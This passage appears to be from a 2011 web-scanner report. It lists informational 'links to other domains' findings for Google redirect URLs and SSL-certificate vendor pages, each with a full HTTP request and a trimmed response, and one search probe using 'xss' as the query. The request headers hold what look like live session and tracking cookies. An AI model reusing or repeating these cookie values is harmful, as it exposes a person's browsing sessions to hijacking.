Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS

Response

HTTP/1.1 302 Found
Location: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sat, 03 Sep 2011 21:29:38 GMT
Server: gws
Content-Length: 262
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html">here</A>
...[SNIP]...

17.46. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=productsearch&cd=3&ved=0CGYQgwgwAg&url=http%3A%2F%2Fwww.digicert.com%2Fev-ssl-certification.htm&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNGWERc8ZzISp_5anvj7ZxS2YX7feA

The response contains the following link to another domain:

http://www.digicert.com/ev-ssl-certification.htm

Request

GET /url?sa=t&source=productsearch&cd=3&ved=0CGYQgwgwAg&url=http%3A%2F%2Fwww.digicert.com%2Fev-ssl-certification.htm&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNGWERc8ZzISp_5anvj7ZxS2YX7feA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS

Response

HTTP/1.1 302 Found
Location: http://www.digicert.com/ev-ssl-certification.htm
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sat, 03 Sep 2011 21:29:30 GMT
Server: gws
Content-Length: 245
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.digicert.com/ev-ssl-certification.htm">here</A>
...[SNIP]...

17.47. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=productsearch&cd=10&ved=0CH0QgwgwCQ&url=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNFsfCAB9_sn-KHfTRexaoIMEBXZig

The response contains the following link to another domain:

http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html

Request

GET /url?sa=t&source=productsearch&cd=10&ved=0CH0QgwgwCQ&url=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNFsfCAB9_sn-KHfTRexaoIMEBXZig HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS

Response

HTTP/1.1 302 Found
Location: http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sat, 03 Sep 2011 21:29:49 GMT
Server: gws
Content-Length: 261
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html">here</A>
...[SNIP]...

17.48. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=productsearch&cd=5&ved=0CGwQgwgwBA&url=http%3A%2F%2Fwww.hostnj.net%2Fproducts-page%2Fssl-security%2Fcomodo-intranet-ssl-certificate%2F&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNFMK43d9_-NqHOqbCnBUy0_SDqJuA

The response contains the following link to another domain:

http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/

Request

GET /url?sa=t&source=productsearch&cd=5&ved=0CGwQgwgwBA&url=http%3A%2F%2Fwww.hostnj.net%2Fproducts-page%2Fssl-security%2Fcomodo-intranet-ssl-certificate%2F&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNFMK43d9_-NqHOqbCnBUy0_SDqJuA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS

Response

HTTP/1.1 302 Found
Location: http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sat, 03 Sep 2011 21:29:35 GMT
Server: gws
Content-Length: 278
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/">here</A>
...[SNIP]...

17.49. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=productsearch&cd=4&ved=0CGkQgwgwAw&url=http%3A%2F%2Fwww.microcad.ca%2Fproducts%2Fdetails%2FMcAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760%3Futm_source%3Dgoogle%26utm_medium%3Dproduct-search&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNExUl7L4Dzliiaoi4l7WmN74UIPUg

The response contains the following link to another domain:

http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760?utm_source=google&utm_medium=product-search

Request

GET /url?sa=t&source=productsearch&cd=4&ved=0CGkQgwgwAw&url=http%3A%2F%2Fwww.microcad.ca%2Fproducts%2Fdetails%2FMcAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760%3Futm_source%3Dgoogle%26utm_medium%3Dproduct-search&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNExUl7L4Dzliiaoi4l7WmN74UIPUg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS

Response

HTTP/1.1 302 Found
Location: http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760?utm_source=google&utm_medium=product-search
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sat, 03 Sep 2011 21:29:33 GMT
Server: gws
Content-Length: 370
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760?utm_source=google&utm_medium=product-search">here</A>
...[SNIP]...

17.50. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=productsearch&cd=7&ved=0CHMQgwgwBg&url=http%3A%2F%2Fwww.digicert.com%2Fwelcome%2Fssl-plus.htm&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNG5XoM79s5Ubd5yD244_CJoyT0TBQ

The response contains the following link to another domain:

http://www.digicert.com/welcome/ssl-plus.htm

Request

GET /url?sa=t&source=productsearch&cd=7&ved=0CHMQgwgwBg&url=http%3A%2F%2Fwww.digicert.com%2Fwelcome%2Fssl-plus.htm&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNG5XoM79s5Ubd5yD244_CJoyT0TBQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS

Response

HTTP/1.1 302 Found
Location: http://www.digicert.com/welcome/ssl-plus.htm
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sat, 03 Sep 2011 21:29:43 GMT
Server: gws
Content-Length: 241
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.digicert.com/welcome/ssl-plus.htm">here</A>
...[SNIP]...

17.51. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=productsearch&cd=9&ved=0CHoQgwgwCA&url=https%3A%2F%2Fwww.sslmatrix.com%2Fssl-promotion-code&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNEBGbM1oprIXYX77VUmXC-L94ASTw

The response contains the following link to another domain:

https://www.sslmatrix.com/ssl-promotion-code

Request

GET /url?sa=t&source=productsearch&cd=9&ved=0CHoQgwgwCA&url=https%3A%2F%2Fwww.sslmatrix.com%2Fssl-promotion-code&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNEBGbM1oprIXYX77VUmXC-L94ASTw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS

Response

HTTP/1.1 302 Found
Location: https://www.sslmatrix.com/ssl-promotion-code
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sat, 03 Sep 2011 21:29:47 GMT
Server: gws
Content-Length: 241
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="https://www.sslmatrix.com/ssl-promotion-code">here</A>
...[SNIP]...

17.52. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=productsearch&cd=1&ved=0CF8QgwgwAA&url=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl-premium.html&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNFY7rOaxiv9djO3gofuxJMIKQ0fVQ

The response contains the following link to another domain:

http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html

Request

GET /url?sa=t&source=productsearch&cd=1&ved=0CF8QgwgwAA&url=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl-premium.html&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNFY7rOaxiv9djO3gofuxJMIKQ0fVQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS

Response

HTTP/1.1 302 Found
Location: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sat, 03 Sep 2011 21:29:23 GMT
Server: gws
Content-Length: 269
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html">here</A>
...[SNIP]...

17.53. http://www.hostnj.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hostnj.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.hostnj.net/?s=xss

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js?ver=3.2.1
http://apis.google.com/js/plusone.js?ver=1.0.0
http://dl.dropbox.com/u/40144809/AMTRemoteHelpdesk.exe
http://fonts.googleapis.com/css?family=Arial
http://gplus.to/shaunrieman
http://s.gravatar.com/js/gprofiles.js?w&ver=3.2.1
http://stats.wordpress.com/e-201135.js
http://w.sharethis.com/button/buttons.js?ver=3.2.1
http://www.connecttoremotesupport.com/
http://www.connecttoremotesupport.com/internet-services/
http://www.linkedin.com/in/proadvanced
http://www.proadvanced.com/
http://www.proadvanced.com/wp-content/uploads/2011/08/hostnjnetlogo.png
http://www.shopamt.com/
http://www.shrinktheweb.com/scripts/pagepix.js?ver=3.2.1
http://www.youtube.com/connectremotesupport
https://connect.facebook.net/en_US/all.js
https://platform.twitter.com/widgets.js
https://twitter.com/
https://twitter.com/ConnectToRemote
https://twitter.com/HostNJ
https://www.facebook.com/proADVANCED

Request

GET /?s=xss HTTP/1.1
Host: www.hostnj.net
Proxy-Connection: keep-alive
Referer: http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0c4jdvo08lk3se1ijpreg0j3o3; __switchTo5x=72; __unam=c6276e8-13231331aee-5ff43484-1; __utma=214552206.1055042161.1315085425.1315085425.1315085425.1; __utmb=214552206.1.10.1315085425; __utmc=214552206; __utmz=214552206.1315085425.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __qca=P0-1742493612-1315085426300

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.hostnj.net/xmlrpc.php
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:41:21 GMT
Content-Length: 32399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lan
...[SNIP]...
<link rel="pingback" href="http://www.hostnj.net/xmlrpc.php" />


   <link href='http://fonts.googleapis.com/css?family=Arial' rel='stylesheet' type='text/css' />


   <link rel="alternate" type="application/rss+xml" title="HostNJ.net » Feed" href="http://www.hostnj.net/feed/" />
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js?ver=3.2.1'></script>
<script type='text/javascript' src='http://www.shrinktheweb.com/scripts/pagepix.js?ver=3.2.1'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://apis.google.com/js/plusone.js?ver=1.0.0'></script>
...[SNIP]...
<li id="menu-item-43" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-43"><a href="http://www.connecttoremotesupport.com/internet-services/">Support</a>
...[SNIP]...
<div class="icons">

           <a href="https://www.facebook.com/proADVANCED" target="_blank"><img src="http://www.hostnj.net/wp-content/themes/business-lite/images/social/facebook.png" alt="Facebook" /></a>
                       <a href="https://twitter.com/#!/ConnectToRemote" target="_blank"><img src="http://www.hostnj.net/wp-content/themes/business-lite/images/social/twitter.png" alt="Twitter" /></a>
                   <a href="http://gplus.to/shaunrieman" target="_blank"><img src="http://www.hostnj.net/wp-content/themes/business-lite/images/social/gplus.png" alt="Google Plus" /></a>
                   <a href="http://www.linkedin.com/in/proadvanced" target="_blank"><img src="http://www.hostnj.net/wp-content/themes/business-lite/images/social/linkedin.png" alt="LinkedIn" /></a>
                       <a href="http://www.youtube.com/connectremotesupport" target="_blank"><img src="http://www.hostnj.net/wp-content/themes/business-lite/images/social/youtube.png" alt="YouTube" />
...[SNIP]...
</div><script src="https://connect.facebook.net/en_US/all.js#appId=155968974484555&xfbml=1"></script>
...[SNIP]...
<br />
<a href="https://twitter.com/ConnectToRemote" class="twitter-follow-button" data-show-count="false">Follow @ConnectToRemote</a>
<script src="https://platform.twitter.com/widgets.js" type="text/javascript"></script><br /><a href="https://twitter.com/HostNJ" class="twitter-follow-button" data-show-count="false">Follow @HostNJ</a>
<script src="https://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-43"><a href="http://www.connecttoremotesupport.com/internet-services/">Support</a>
...[SNIP]...
<div class="textwidget"><a href="http://www.proadvanced.com"><img src="http://www.hostnj.net/wp-content/uploads/2011/08/AMT-Logo-Web.jpg" width="250" />
...[SNIP]...
<li><a href="http://dl.dropbox.com/u/40144809/AMTRemoteHelpdesk.exe" rel="me" target="_blank">AMT Remote Helpdesk</a>
...[SNIP]...
<li><a href="http://www.proadvanced.com" rel="me" target="_blank">Advanced Micro Technologies</a>
...[SNIP]...
<li><a href="http://www.ConnectToRemoteSupport.com" rel="me" target="_blank">Customer Support</a>
...[SNIP]...
<li><a href="https://twitter.com/#!/ConnectToRemote" target="_blank">Follow us on Twitter</a>
...[SNIP]...
<li><a href="https://www.facebook.com/proADVANCED" target="_blank">Like us on Facebook</a>
...[SNIP]...
<li><a href="http://www.shopamt.com" rel="me" target="_blank">ShopAMT</a></li>
<li><a href="http://www.youtube.com/connectremotesupport" target="_blank">YouTube Channel</a>
...[SNIP]...
</script>
<script type='text/javascript' src='http://w.sharethis.com/button/buttons.js?ver=3.2.1'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?w&ver=3.2.1'></script>
...[SNIP]...
</div>

   <script src="http://stats.wordpress.com/e-201135.js" type="text/javascript"></script>
...[SNIP]...
<div class="icons">

           <a href="https://www.facebook.com/proADVANCED" target="_blank"><img src="http://www.hostnj.net/wp-content/themes/business-lite/images/social/facebook.png" alt="Facebook" /></a>
                       <a href="https://twitter.com/#!/ConnectToRemote" target="_blank"><img src="http://www.hostnj.net/wp-content/themes/business-lite/images/social/twitter.png" alt="Twitter" /></a>
                   <a href="http://gplus.to/shaunrieman" target="_blank"><img src="http://www.hostnj.net/wp-content/themes/business-lite/images/social/gplus.png" alt="Google Plus" /></a>
                   <a href="http://www.linkedin.com/in/proadvanced" target="_blank"><img src="http://www.hostnj.net/wp-content/themes/business-lite/images/social/linkedin.png" alt="LinkedIn" /></a>
                       <a href="http://www.youtube.com/connectremotesupport" target="_blank"><img src="http://www.hostnj.net/wp-content/themes/business-lite/images/social/youtube.png" alt="YouTube" />
...[SNIP]...
<a href="http://www.hostnj.net"><img src="http://www.proadvanced.com/wp-content/uploads/2011/08/hostnjnetlogo.png" alt="HostNJ net"/></a>
...[SNIP]...

17.54. http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microcad.ca
Path:	/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760

Issue detail

The page was loaded from a URL containing a query string:

http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760?utm_source=google&utm_medium=product-search

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/themes/base/jquery-ui.css
http://content.etilize.com/images/160/1011956760.jpg?noimage=logo
http://fonts.googleapis.com/css?family=Droid+Sans:regular,bold
http://www.facebook.com/microcadcorp
http://www.twitter.com/microcadcorp
https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js
https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js
https://seal.godaddy.com/getSeal?sealID=J1AC4JSCyRkHT7RkNR74WDnAE6gCXcX7GcaWPukWaY1iN1vWF7f2CMS85

Request

GET /products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760?utm_source=google&utm_medium=product-search HTTP/1.1
Host: www.microcad.ca
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
